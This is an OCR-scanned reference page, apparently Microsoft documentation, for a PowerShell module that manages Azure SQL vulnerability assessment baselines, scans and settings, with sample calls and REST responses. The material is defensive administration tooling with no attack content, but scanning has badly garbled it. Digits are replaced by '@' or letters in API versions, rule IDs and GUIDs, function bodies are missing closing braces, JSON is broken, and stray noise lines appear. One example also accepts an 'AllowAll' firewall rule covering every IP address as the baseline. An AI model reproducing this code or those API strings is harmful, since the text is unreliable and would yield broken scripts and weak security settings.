Microsoft.Sql/servers/$ServerName/databases/$DatabaseName/sqlVulnerabilityAs 
sessments/default/scans/$ScanId/scanResults/$RuleId" + "?api-version=2022- 
@2-@1-preview" 
} 
return SendRestRequest -Method "Get" -Uri $Uri 


###Sql Vulnerability Assessment Scans### 


# Get 
function Get-SqlVulnerabilityAssessmentScans([parameter(mandatory)] [string] 
$SubscriptionId, [parameter(mandatory)] [string] $ResourceGroupName, 
[parameter(mandatory)] [string] $ServerName, [parameter(mandatory)] [string] 
$DatabaseName, $ScanId) { 
<# 
- SYNOPSIS 
Gets vulnerability assessment scan summary from the database. 


. DESCRIPTION 
Gets vulnerability assessment scan summary from the database. 


.PARAMETER SubscriptionId 
Subscription id. 


.PARAMETER ResourceGroupName 
Resource group name. 


. PARAMETER ServerName 
Server name. 


.PARAMETER DatabaseName 
Database name. 


.PARAMETER ScanId 
Scan id. 


. EXAMPLE 
Get-SqlVulnerabilityAssessmentScans -SubscriptionId 00000000-1111- 
2222-3333-444444444444-ResourceGroupName vulnerabilityaseessmenttestRg - 
ServerName vulnerabilityaseessmenttest -DatabaseName db -ScanId latest 
Headers : {[Cache-Control, System.String[]], [Pragma, 
System.String[]], [x-ms-request-id, System.String[]], [Server, 
System.String[ ] ]...} 


Version Sebe] 
StatusCode : 200 
Method : GET 
Content : {"properties":{"scanId":"f64d81a1-9d7b-4516-a623- 


albfc845ed7e", "triggerType":"OnDemand", "state": "Passed", " 
startTime" :"2023-04- 

17712:52:41.4142209Z" , “endTime” :"2023-04- 

17712:52:41.5235755Z", "server": "vulnerabilityaseessmenttest 


","database":"db","sqlVersion": "16.80.5100", "highSeverityFailedRulesCount":@, 
"mediumSeverityFailedRulesCou 


nt":@, "lowSeverityFailedRulesCount":@, "totalPassedRulesCount":24,"totalFaile 
dRulesCount":@, "totalRulesCoun 


t":24,"isBaselineApplied":true}, "id":"/subscriptions/00000000-1111-2222- 
3333-444444444444/resourceGroups/m 


igrationscripttests/providers/Microsoft.Sql/servers/vulnerabilityaseessmentt 

est/databases/db/vulnerabilityAssessments/D 
efault/scans/f64d81a1-9d7b-4516-a623- 

albfc845ed7e", "name": "f64d81a1-9d7b-4516-a623-albfc845ed7e", "type": TN 


icrosoft.Sql/servers/databases/vulnerabilityAssessments/scans" } 


. EXAMPLE 

Get-SqlVulnerabilityAssessmentScans -SubscriptionId 00000000-1111- 
2222-3333-444444444444-ResourceGroupName vulnerabilityaseessmenttestRg - 
ServerName vulnerabilityaseessmenttest -DatabaseName db 


Headers : {[Cache-Control, System.String[]], [Pragma, 
System.String[]], [x-ms-request-id, System.String[]], [Server, 
System.String[ ] ]...} 


Version pol call 
StatusCode : 200 
Method GE 
Content : {"value":[{"properties":{"scanId":"f64d81a1-9d7b-4516- 


a623-albfc845ed7e", "triggerType": "OnDemand", “state”: 
"Passed", "startTime":"2023-04- 
177T12:52:41.4142209Z", "endTime" :"2023-04-177T12:52:41.5235755Z", "server": 


"vulnerabilityaseessmenttest", "database": "db", "sqlVersion":"16.0.5100", "high 
SeverityFailedRulesCount":@, "mediumSeverityFail 


edRulesCount":0, "lowSeverityFailedRulesCount":@, “totalPassedRulesCount": 24," 
totalFailedRulesCount":@,"tota 


1RulesCount":24,"isBaselineApplied": true}, “id":"/subscriptions/e@eeeeeee- 
1111-2222-3333-444444444444/resour 


ceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulne 
rabilityaseessmenttest/databases/db/vulnerabilityAss 
essments/Default/scans/f64d81a1-9d7b-4516-a623- 
albfc845ed7e", "name": "£64d81a1-9d7b-4516-a623-albfc845ed7e" 
, type":"Microsoft.Sql/servers/databases/vulnerabilityAssessments/scans"}]} 
#> 
if ($DatabaseName -eq 'master') { 
$Uri = 
"/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/ providers / 
Microsoft.Sql/servers/$ServerName/sqlVulnerabilityAssessments/default/scans/ 
$ScanId" + "“?api-version=2022-02-01-preview&systemDatabaseName=master" 
} else { 
$Uri = 
"/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/ 
Microsoft.Sql/servers/$ServerName/databases/$DatabaseName/sqlVulnerabilityAs 
sessments/default/scans/$ScanId" + "?api-version=2022-02-01-preview" 


} 
return SendRestRequest -Method "Get" -Uri $Uri 


###Sql Vulnerability Assessment Execute Scan### 


# Invoke 
function Invoke-SqlVulnerabilityAssessmentScan( [parameter (mandatory) ] 
[string] $SubscriptionId, [parameter(mandatory)] [string] 
$ResourceGroupName, [parameter(mandatory)] [string] $ServerName, 
[parameter(mandatory)] [string] $DatabaseName) { 
<# 
. SYNOPSIS 
Runs vulnerability assessment scan on the database. 


.DESCRIPTION 
Runs vulnerability assessment scan on the database. 


.PARAMETER SubscriptionId 
Subscription id. 


.PARAMETER ResourceGroupName 
Resource group name. 


-PARAMETER ServerName 
Server name. 


. PARAMETER DatabaseName 
Database name. 


. EXAMPLE 
Invoke-SqlVulnerabilityAssessmentScan -SubscriptionId 90000000-1111- 
2222-3333-444444444444-ResourceGroupName vulnerabilityaseessmenttestRg - 
ServerName vulnerabilityaseessmenttest -DatabaseName db 
Headers : {[Cache-Control, System.String[]], [Pragma, 
System.String[]], [Location, System.String[]], [Retry-After, S 
ystem.String[ ] ]...} 


Version bd) 
StatusCode : 202 
Method : POST 
Content 


{"operation": "ExecuteDatabaseVulnerabilityAssessmentScan", "startTime" :"2023- 
@5-15T10:58:48.367Z"} 
#> 
if ($DatabaseName -eq ‘master') { 
$Uri = 
"/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/ providers / 
Microsoft.Sql/servers/$ServerName/sqlVulnerabilityAssessments/default/initia 
teScan?api-version=2022-02-01-preview&systemDatabaseName=master" 
} else { 
$Uri = 
"/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/ providers / 
Microsoft.Sql/servers/$ServerName/databases/$DatabaseName/sqlVulnerabilityAs 
sessments/default/initiateScan?api-version=2022-02-01-preview" 


} 
SendRestRequest -Method "Post" -Uri $Uri 


###Sql Vulnerability Assessments Settings### 


# Get 
function Get-SqlVulnerabilityAssessmentServerSetting([parameter(mandatory)] 
[string] $SubscriptionId, [parameter(mandatory)] [string] 
$ResourceGroupName, [parameter(mandatory)] [string] $ServerName) { 
<# 
. SYNOPSIS 
Gets vulnerability assessment settings of the server. 


. DESCRIPTION 
Gets vulnerability assessment settings of the server. 


.PARAMETER SubscriptionId 
Subscription id. 


. PARAMETER ResourceGroupName 
Resource group name. 


. PARAMETER ServerName 
Server name. 


. EXAMPLE 
Get-SqlVulnerabilityAssessmentServerSetting -SubscriptionId 
00000000-1111-2222-3333-444444444444-ResourceGroupName 
vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest 
Headers : {[Cache-Control, System.String[]], [Pragma, 
System.String[]], [x-ms-request-id, System.String[]], [Server, 
System.String[ ] ]...} 


Version Saba] 
StatusCode : 200 
Method GET 
Content : {"properties": 


{"state":"Enabled"},"id":"/subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups 


/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerability 


aseessmenttest/sqlVulnerabilityAssessments/Default", 
name": "Default", "type": " 

#> 

$Uri = 
"/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/ providers / 
Microsoft.Sql/servers/$ServerName/sqlVulnerabilityAssessments/default?api- 
version=2022-@2-01-preview" 

return SendRestRequest -Method "Get" -Uri $Uri 


Microsoft.Sql/servers/sqlVulnerabilityAssessments" } 


# Set 
function Set-SqlVulnerabilityAssessmentServerSetting( [parameter (mandatory) ] 
[string] $SubscriptionId, [parameter(mandatory)] [string] 
$ResourceGroupName, [parameter(mandatory)] [string] $ServerName, 
[parameter(mandatory)] [string] $State) { 
<# 
. SYNOPSIS 
Sets vulnerability assessment settings on the server. 


. DESCRIPTION 
Sets vulnerability assessment settings on the server. 


.PARAMETER SubscriptionId 
Subscription id. 


.PARAMETER ResourceGroupName 
Resource group name. 


. PARAMETER ServerName 
Server name. 


PARAMETER State 
Setting's state. 


. EXAMPLE 

Set-SqlVulnerabilityAssessmentServerSetting -SubscriptionId 
00000000 -1111-2222-3333-444444444444-ResourceGroupName 
vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest -State 
"Enabled ' 

Headers : {[Cache-Control, System.String[]], [Pragma, 
System.String[]], [x-ms-request-id, System.String[]], [Server, 

System. String[ ] J...} 


Version lel 
StatusCode : 200 
Method : PUT 
Content : {"properties": 


{"state":"Enabled"},"id":"/subscriptions/00000000-1111-2222-3333- 
444444444444/resourceGroups 


/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerability 


aseessmenttest/sqlVulnerabilityAssessments/Default", 


name": "Default", "type": "Microsoft .Sql/servers/sqlVulnerabilityAssessments"} 
. EXAMPLE 
Set-SqlVulnerabilityAssessmentServerSetting -SubscriptionId 
00000000 -1111-2222-3333-444444444444-ResourceGroupName 
vulnerabilityaseessmenttestRg -ServerName vulnerabilityaseessmenttest -State 
‘Disabled' 
Headers : {[Cache-Control, System.String[]], [Pragma, 
System.String[]], [x-ms-request-id, System.String[]], [Server, 
System.String[ ] ]...} 


Version SORO) 
StatusCode : 200 
Method : PUT 
Content : {"properties": 


{"state":"Disabled"},"id":"/subscriptions/00000000-1111-2222-3333- 
444444444444 /resourceGroup 


s/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnerabilit 
yaseessmenttest/sqlVulnerabilityAssessments/Default", 


"name":"Default", "type": "Microsoft.Sql/servers/sqlVulnerabilityAssessments" } 


#> 
$Body = @{ 
properties = @{ 
state = $State 
} 
} 


$Body = $Body | ConvertTo-Json 


$Uri = 
"/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/providers/ 
Microsoft.Sql/servers/$ServerName/sqlVulnerabilityAssessments/default?api- 
version=2022-@2-01-preview" 


return SendRestRequest -Method "Put" -Uri $Uri -Body $Body 


# Remove 
function Remove- 
SqlVulnerabilityAssessmentServerSetting([parameter(mandatory)] [string] 
$SubscriptionId, [parameter(mandatory)] [string] $ResourceGroupName, 
[parameter(mandatory)] [string] $ServerName) { 
<# 
. SYNOPSIS 
Deletes vulnerability assessment settings on the server. 


. DESCRIPTION 
Deletes vulnerability assessment settings on the server. 


.PARAMETER SubscriptionId 
Subscription id. 


.PARAMETER ResourceGroupName 
Resource group name. 


-PARAMETER ServerName 
Server name. 


. EXAMPLE 

Headers : {[Pragma, System.String[]], [x-ms-request-id, 
System.String[]], [x-ms-ratelimit-remaining-subscription-deletes, 
System.String[]], [x-ms-correlation-request-id, System.String[]]...} 


Version te all 
StatusCode : 200 
Method “DELETE 
Content 

#> 

$Uri = 


"/subscriptions/$SubscriptionId/resourceGroups/$ResourceGroupName/ providers / 
Microsoft.Sql/servers/$ServerName/sqlVulnerabilityAssessments/default?api- 
version=2022-02-01-preview" 

return SendRestRequest -Method "Delete" -Uri $Uri 


function SendRestRequest( 
[Parameter(Mandatory = $True) ] 
[string] $Method, 
[Parameter(Mandatory = $True) ] 
[string] $Uri, 
[parameter( Mandatory = $false )] 
[string] $Body = "DEFAULT") { 


$Params = @{ 
Method = $Method 
Path = $Uri 


if (!($Body -eq "DEFAULT")) { 


$Params = @{ 
Method = $Method 
Path = $Uri 
Payload = $Body 

} 


Invoke-AzRestMethod @Params 


# Exported functions 

Export-ModuleMember -Function Set-SqlVulnerabilityAssessmentBaseline 
Export-ModuleMember -Function Get-SqlVulnerabilityAssessmentBaseline 
Export-ModuleMember -Function Set-SqlVulnerabilityAssessmentBaselineRule 
Export-ModuleMember -Function Get-SqlVulnerabilityAssessmentBaselineRule 
Export-ModuleMember -Function Remove-SqlVulnerabilityAssessmentBaselineRule 
Export-ModuleMember -Function Get-SqlVulnerabilityAssessmentScanResults 
Export-ModuleMember -Function Get-SqlVulnerabilityAssessmentScans 
Export-ModuleMember -Function Invoke-SqlVulnerabilityAssessmentScan 
Export-ModuleMember -Function Get-SqlVulnerabilityAssessmentServerSetting 


Export-ModuleMember -Function Set-SqlVulnerabilityAssessmentServerSetting 
Export-ModuleMember -Function Remove-SqlVulnerabilityAssessmentServerSetting 


Next steps 


Express configuration PowerShell commands reference 


Express configuration PowerShell 
commands reference 


Article e 06/05/2023 


This article lists the PowerShell commands that can be used with SQL vulnerability 
assessment express configuration. 


Make a local copy of the script located on Express configuration PowerShell wrapper 
module, and save the file with the following file name 
SqlVulnerabilityAssessmentCommands.psm1, which can be referenced with the following 


commands: 


e Set SQL vulnerability assessment baseline 

e Get SQL vulnerability assessment baseline 

e Set SQL vulnerability assessment baseline rule 

e Remove SQL vulnerability assessment baseline rule 
e Get SQL vulnerability assessment scan results 

e Get SQL vulnerability assessment scan 

e Invoke SQL vulnerability assessment scan 

e Get SQL vulnerability assessment server setting 

e Set SQL vulnerability assessment server setting 

e Remove SQL vulnerability assessment server setting 


Set SQL vulnerability assessment baseline 
Example 1: 


Azure PowerShell 


Connect-AzAccount -Subscription 90000000-1111-2222-3333-444444444444 
Import-Module .\SqlVulnerabilityAssessmentCommands.psm1 
Set-SqlVulnerabilityAssessmentBaseline -SubscriptionId 00000000-1111-2222- 
3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg - 
ServerName vulnerabilityaseessmenttest -DatabaseName db -Body '{ 


"properties": { "latestScan": true, "results": {} KN 
Results: 
Headers : {[Pragma, System.String[]], [x-ms-request-id, System.String[]], 


[x-ms-ratelimit-remaining-subscription-writes, System.String[]], [x-ms- 
correlation-request-id, System.String[]]...} 

Version g dod 

StatusCode : 200 

Method > PUT 


Content : {"properties":{"results":{"VA1143":[["True"]],"VA1219": 
[["False"]]}},"id":"/subscriptions/00000000-1111- 2222 -3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/serv 


ers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Def 
ault/baselines/Default", "name": "Default", "type": "Microsoft.Sql/servers/datab 
ases/sqlVulnerabilityAssessments/baselines" } 


Example 2: 
Azure PowerShell 


Connect-AzAccount -Subscription 90000000-1111-2222-3333-444444444444 
Import-Module .\SqlVulnerabilityAssessmentCommands.psm1 
Set-SqlVulnerabilityAssessmentBaseline -SubscriptionId @0000@000-1111-2222- 
3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg - 
ServerName vulnerabilityaseessmenttest -DatabaseName db -Body '{ 
"properties": { 
"latestScan": false, 
AIZINA 


"VA2062": [ 
[ 
"AllowAll", 
"8.0.0.0", 
1255725572557255% 
] 
] 
J; 
J 
} 
Results: 
Headers : {[Pragma, System.String[]], [x-ms-request-id, System.String[]], 


[x-ms-ratelimit-remaining-subscription-writes, System.String[]], [x-ms- 
correlation-request-id, System.String[]]...} 


Version SLI 
StatusCode : 200 
Method : PUT 
Content : {"properties":{"results":{"VA2062": 


[ ["AllowA11","0.0.0.0","255.255.255.255"]]}}, "id": "/subscriptions/0e00000- 
RKE 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microso 


ft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAsse 


ssments/Default/baselines/Default", "name": "Default", "type": "Microsoft.Sql/se 
rvers/databases/sqlVulnerabilityAssessments/baseline 


s"} 


Get SQL vulnerability assessment baseline 


Azure PowerShell 


Connect-AzAccount -Subscription 00000000-1111-2222-3333-444444444444 
Import-Module .\SqlVulnerabilityAssessmentCommands.psm1 
Get-SqlVulnerabilityAssessmentBaseline -SubscriptionId 00000000-1111-2222- 
3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg - 
ServerName vulnerabilityaseessmenttest -DatabaseName db 


Results: 
Headers : {[Pragma, System.String[]], [x-ms-request-id, System.String[]], 


[x-ms-ratelimit-remaining-subscription-reads, System.String[]], [x-ms- 
correlation-request-id, System.String[]]...} 


Version Sidi 
StatusCode : 200 
Method : GET 
Content : {"properties":{"results":{"VA1143":[["True"]],"VA1219": 


[["False"]]}},"id":"/subscriptions/00000000-1111 - 2222 -3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/serv 


ers/vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Def 


ault/baselines/Default", "name": "Default", "type": "Microsoft.Sql/servers/datab 
ases/sqlVulnerabilityAssessments/baselines"} 


Set SQL vulnerability assessment baseline rule 


Azure PowerShell 


Connect-AzAccount -Subscription 90000000-1111-2222-3333-444444444444 
Import-Module .\SqlVulnerabilityAssessmentCommands.psm1 
Set-SqlVulnerabilityAssessmentBaselineRule -SubscriptionId eeeeeeee-1111- 
2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg - 
ServerName vulnerabilityaseessmenttest -DatabaseName db -RuleId VA2@62 -Body 
SO 
"properties": { 
"latestScan": false, 
"results": [ 


[ 
"AllowAll1", 
"8.0.0.0", 
VOID) AS a ASS), OS” 

] 

] 
b 
y 
Headers : {[Cache-Control, System.String[]], [Pragma, System.String[]], 


[x-ms-request-id, System.String[]], [Server, 
System. String[ ] ]...} 
Version lal 


StatusCode : 200 

Method : PUT 

Content : {"properties":{"results": 

[["AllowA11", "0.0.0.0", "255.255.255.255"]]}, "id": "/subscriptions/@e@e@eee00- 
11117222273838: 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/dat 


abases/db/sqlVulnerabilityAssessments/Default/baselines/default/rules/VA2062 
", "name": "VA2@62", "type": "Mic 


rosoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines"} 


Get SQL vulnerability assessment baseline rule 
Example 1: 
Azure PowerShell 


Connect-AzAccount -Subscription 90000000-1111-2222-3333-444444444444 
Import-Module .\SqlVulnerabilityAssessmentCommands.psm1 
Get-SqlVulnerabilityAssessmentBaselineRule -SubscriptionId 00000000-1111- 
2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg - 
ServerName vulnerabilityaseessmenttest -DatabaseName db -RuleId VA2062 


Headers : {[Cache-Control, System.String[]], [Pragma, System.String[]], 
[x-ms-request-id, System.String[]], [Server, 
System.String[ ] ]...} 


Version SOZ) 
StatusCode : 200 
Method : GET 
Content : {"properties":{"results": 


[["AllowA11","0.0.0.0","255.255.255.255"]]}, "id": "/subscriptions/e@eeeeeee- 
1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/vulnerabilityaseessmenttest/dat 


abases/db/sqlVulnerabilityAssessments/Default/baselines/default/rules/VA2062 
", "name": "VA2062", "type": "Mic 


rosoft.Sql/servers/databases/sqlVulnerabilityAssessments/baselines"} 


Example 2: 
Azure PowerShell 


Connect-AzAccount -Subscription 90000000-1111-2222-3333-444444444444 
Import-Module .\SqlVulnerabilityAssessmentCommands.psm1 
Get-SqlVulnerabilityAssessmentBaselineRule -SubscriptionId 00000000-1111- 
2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg - 


ServerName vulnerabilityaseessmenttest -DatabaseName db 


Headers : {[Cache-Control, System.String[]], [Pragma, System.String[]], 
[x-ms-request-id, System.String[]], [Server, 
System. String[ ] ]...} 


Version S GAl 
StatusCode : 200 
Method > GET 
Content : {"value":[{"properties":{"results": 


[["True"]]}, “id":"/subscriptions/00000000 -1111-2222-3333-444444444444/r 


esourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/ 
vulnerabilityaseessmenttest/databases/db/sqlVulnerab 


ilityAssessments/Default/baselines/default/rules/VA1143", "name": "VA1143", "ty 
pe": "Microsoft.Sql/servers/dat 
abases/sqlVulnerabilityAssessments/baselines"},{"properties”: 
{"results":[["False"]]},"id":"/subscriptions/ 
00000000 -1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 


t.Sql/servers/m 


igrationsqli/databases/db/sqlVulnerabilityAssessments/Default/baselines/defa 
ult/rules/VA1219", "name": "VA1 


219", "type": "Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/bas 
elines"},{"properties":{"resul 

ts": 
[["AllowA11","0.0.0.0","255.255.255.255"]]},"id":"/subscriptions/00000000- 
1111-2222-3333-444444444444/ 


resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers 
/vulnerabilityaseessmenttest/databases/db/sqlVulnera 


bilityAssessments/Default/baselines/default/rules/VA2@62", "name" :"VA2062","t 


ype": "Microsoft.Sql/servers/da 
tabases/sqlVulnerabilityAssessments/baselines"}]} 


Remove SQL vulnerability assessment baseline rule 


Azure PowerShell 


Connect-AzAccount -Subscription 90000000-1111-2222-3333-444444444444 
Import-Module .\SqlVulnerabilityAssessmentCommands.psm1 
Remove-SqlVulnerabilityAssessmentBaselineRule -SubscriptionId 00000000-1111- 
2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg - 
ServerName vulnerabilityaseessmenttest -DatabaseName db -RuleId VA2@62 


Headers : {[Cache-Control, System.String[]], [Pragma, System.String[]], 
[x-ms-request-id, System.String[]], [Server, 

System. String[ ] ]...} 
Version a dod 


StatusCode : 200 
Method : DELETE 
Content 


Get SQL vulnerability assessment scan results 
Example 1: 
Azure PowerShell 


Connect-AzAccount -Subscription 00000000-1111-2222-3333-444444444444 
Import-Module .\SqlVulnerabilityAssessmentCommands.psm1 
Get-SqlVulnerabilityAssessmentScanResults -SubscriptionId 00000000-1111- 
2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg - 
ServerName vulnerabilityaseessmenttest -DatabaseName db -ScanId latest - 
RuleId VA2062 


Headers : {[Cache-Control, System.String[]], [Pragma, System.String[]], 
[x-ms-request-id, System.String[]], [Server, 
System. String[ ] ]...} 


Version § doal 
StatusCode : 200 
Method > GET 
Content : {"properties": 


{"ruleId":"VA2062", "status": "NonFinding", “errorMessage":null, "isTrimmed": fal 
se, "queryResults 
":[],"remediation":{"description":"Remove database firewall 


rules that grant excessive access","scripts":[ 


], "automated": false, "portalLink":""}, "baselineAdjustedResult":null, “ruleMeta 
data": {"ruleId":"VA2@62", "seve 
rity": "High", "category": "SurfaceAreaReduction", “ruleType": "NegativeList", "ti 
tle":"Database-level firewall 

rules should not grant excessive access", "description": "The 
Azure SQL Database-level firewall helps protec 

t your data by preventing all access to your database until you 
specify which IP addresses have permission 

. Database-level firewall rules grant access to the specific 
database based on the originating IP address 

of each request.\n\nDatabase-level firewall rules for master 
and user databases can only be created and ma 

naged through Transact-SQL (unlike server-level firewall rules 
which can also be created and managed using 

the Azure portal or PowerShell). For more details please see: 
https://docs.microsoft.com/en-us/azure/sql- 

database/sql-database-firewall-configure\n\nThis check verifies 
that each database-level firewall rule doe 

s not grant access to more than 255 IP 
addresses.","rationale":"Often, administrators add rules that grant 

excessive access as part of a troubleshooting process - to 
eliminate the firewall as the source of a prob 


lem, they simply create a rule that allows all traffic to pass 
to the affected database.\n\nGranting exces 

sive access using database firewall rules is a clear security 
concern, as it violates the principle of lea 

st privilege by allowing unnecessary access to your database. 
In fact, it's the equivalent of placing the 

database outside of the firewall.", “queryCheck": 
{"query":"SELECT name AS [Firewall Rule Name]\n ystart_ 

ip_address AS [Start Address]\n ,end_ip_ address AS [End 
Address]\nFROM sys.database_firewall_rules\nWHE 


RE ( \n (CONVERT (bigint, parsename(end_ip_address, 1)) 
+\n CONVERT (bigint, parsename(end_ip 

_address, 2)) * 256 + \n CONVERT (bigint, 
parsename(end_ip_address, 3)) * 65536 + \n CONVER 

T(bigint, parsename(end_ip_ address, 4)) * 16777216 ) \n 
- \n (CONVERT(bigint, parsename(star 

t_ip_address, 1)) +\n CONVERT (bigint, 
parsename(start_ip_address, 2)) * 256 + \n CONVERT (b 


igint, parsename(start_ip_address, 3)) * 65536 + \n 
CONVERT(bigint, parsename(start_ip address, 4) 

Ga GSR IAE ) > EEI. "expectedResult": 
[],"columnNames":["Firewall Rule Name", "Start Address","En 

d Address"]},"benchmarkReferences": 
[]}},"id":"/subscriptions/00000000-1111 -2222-3333-444444444444/resource 


Groups/vulnerabilityaseessmenttestRg/providers/Microsoft.Sql/servers/vulnera 
bilityaseessmenttest/databases/db/sqlVulnerabilityAs 


sessments/Default/scans/VA2062/scanResults/VA2@62", "name": "VA2@62","type":"M 
icrosoft.Sql/servers/databases 
/sqiVulnerabilityAssessments/scans/scanResults"} 


Example 2: 


Azure PowerShell 


Connect-AzAccount -Subscription 00000000-1111-2222-3333-444444444444 
Import-Module .\SqlVulnerabilityAssessmentCommands.psm1 
Get-SqlVulnerabilityAssessmentScanResults -SubscriptionId 00000000-1111- 
2222-3333-444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg - 
ServerName vulnerabilityaseessmenttest -DatabaseName db -ScanId latest 


Headers : {[Cache-Control, System.String[]], [Pragma, System.String[]], 
[x-ms-request-id, System.String[]], [Server, 
System.String[ ] ]...} 


Version seeded 
StatusCode : 200 
Method : GET 
Content : {"value":[ 


{"properties":{"ruleId":"VA1219", "status": "No 
nFinding", “errorMessage":null, “isTrimmed":false, "queryResults": 
[["False"]], "remediation": {"description":"E 


nable TDE on the affected databases","scripts”: 


[], "automated": false, "portalLink":"EnableTDE"}, “baselineAdj 
ustedResult":{"baseline":{"expectedResults": 

[["False"]], “updatedTime" :"2023-05-15T08:52:39.3476874+00: 20" } 
» status": "NonFinding", "resultsNotInBaseline": 

[],"resultsOnlyInBaseline":[]}, "ruleMetadata":{"ruleId":"VA1 


219", "severity": "Medium", "category": 
tle":"Transparent data encrypt 

ion should be enabled", "description": 
encryption (TDE) helps to protect the database file 

s against information disclosure by performing real-time 
encryption and decryption of the database, associ 

ated backups, and transaction log files ‘at rest’, without 
requiring changes to the application. This rule 

checks that TDE is enabled on the 
» rationale":"Transparent Data Encryption (TDE) protects data 
"at rest', meaning the data and log files are encrypted when 

stored on disk.","queryCheck":{"query":"SELE 

CT CASE\n WHEN EXISTS (\n GEIEGI Ou 
FROM sys.databases\n 

WHERE db_name(database_id) = db_name()\n 
AND is encrypted = DME )\n 
THEN 1\n ELSE @\n END AS 

[Violation]","expectedResult":[["0"]],"columnNames": ["Vi 

olation"]}, “benchmarkReferences" 
[{"benchmark": "FedRAMP", "reference" :null}]}},"id":"/subscriptions/Ffeeeeee 

OO =A eee 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/providers/Microsof 
t.Sql/servers/ 


DataProtection", "ruleType": "Binary", "ti 


Transparent data 


database. 


vulnerabilityaseessmenttest/databases/db/sqlVulnerabilityAssessments/Default 
/scans/VA1219/scanResults/VA1219", "name": "VA1219"," 
type": "Microsoft.Sql/servers/databases/sqlVulnerabilityAssessments/scans/sca 
nResults"},{"prope 

rties": 
{"ruleId":"VA1223", "status": "NonFinding", “errorMessage":null, "isTrimmed": fal 
se, "queryResults":[],"r 

emediation":{"description": 
the data/sign-data using the new key, and 

drop the affected keys.","scripts": 
[], "automated": false, "portalLink":""}, "baselineAdjustedResult":null, "ru 

leMetadata": 
{"ruleId":"VA1223","severity": "High", "category": 
"NegativeList", "ti 

tle": "Certificate keys should use at least 2048 
bits", "description":"Certificate keys are used in RSA and 

other encryption algorithms to protect data. These keys need to 
be of enough length to secure the user's d 

ata. This rule checks that the key's length is at least 2048 
bits for all certificates.","rationale": "Key 

length defines the upper-bound on the encryption algorithm's 
security. Using short keys in encryption algo 

rithms may lead to weaknesses in data-at-rest 

","queryCheck":{"query":"SELECT name AS [Certific 


Create new certificates, re-encrypt 


DataProtection", "ruleType": 


protection. 


ate Name], thumbprint AS [Thumbprint]\nFROM 
sys.certificates\nWHERE key_length < 2048","expectedResult":[ ] 

, columnNames":[ "Certificate 
Name", “Thumbprint"]}, “"benchmarkReferences": 
[{"benchmark":"FedRAMP", "reference 

":null}]}}, "id": "/subscriptions/@0000000-1111-2222-3333- 
444444444444/resourceGroups/vulnerabilityaseessmenttestRg/p 


roviders/Microsoft.Sql/servers/vulnerabilityaseessmenttest/databases/db/sqlV 
ulnerabilityAssessments/Default/scans/VA122 


3/scanResults/VA1223", "name": "VA1223", "type": "Microsoft.Sql/servers/database 
s/sqlVulnerabilityAssessments/ 
scans/scanResults"}]} 


Get SQL vulnerability assessment scan 
Example 1: 


Azure PowerShell 


Connect-AzAccount -Subscription 00000000-1111-2222-3333-444444444444 
Import-Module .\SqlVulnerabilityAssessmentCommands .psm1 
Get-SqlVulnerabilityAssessmentScans -SubscriptionId 00000000-1111-2222-3333- 
444444444444 -ResourceGroupName vulnerabilityaseessmenttestRg -ServerName 
vulnerabilityaseessmenttest -DatabaseName db -ScanId latest 


Headers : {[Cache-Control, System.String[]], [Pragma, System.String[]], 
[x-ms-request-id, System.String[]], [Server, 
System. String[ ] ]...} 


Version g dod 
StatusCode : 200 
Method > GET 
Content : {"properties":{"scanId":"f64d81a1-9d7b-4516-a623- 


albfc845ed7e", "triggerType": "OnDemand", "state": "Passed", " 
startTime"™ :"2023-@4-17T12:52:41.41422692", “endTime" :"2023-04- 
17712:52:41.5235755Z", "server": "vulnerabilityaseessmenttest 


", "database": "db", "sqlVersion":"16.0.5100", "highSeverityFailedRulesCount”:0, 
“mediumSeverityFailedRulesCou 


nt":@, "lowSeverityFailedRulesCount":@, "totalPassedRulesCount":24,"totalFaile 

dRulesCount":@, "totalRulesCoun 
t":24,"isBaselineApplied":true}, "id": "/subscriptions/800000e0- 

1111-2222-3333-444444444444/resourceGroups/m 


igrationscripttests/providers/Microsoft.Sql/servers/vulnerabilityaseessmentt 

est/databases/db/vulnerabilityAssessments/D 
efault/scans/f64d81a1-9d7b-4516-a623- 

albfc845ed7e", "name": "f64d81a1-9d7b-4516-a623-albfc845ed7e", "type": TN 
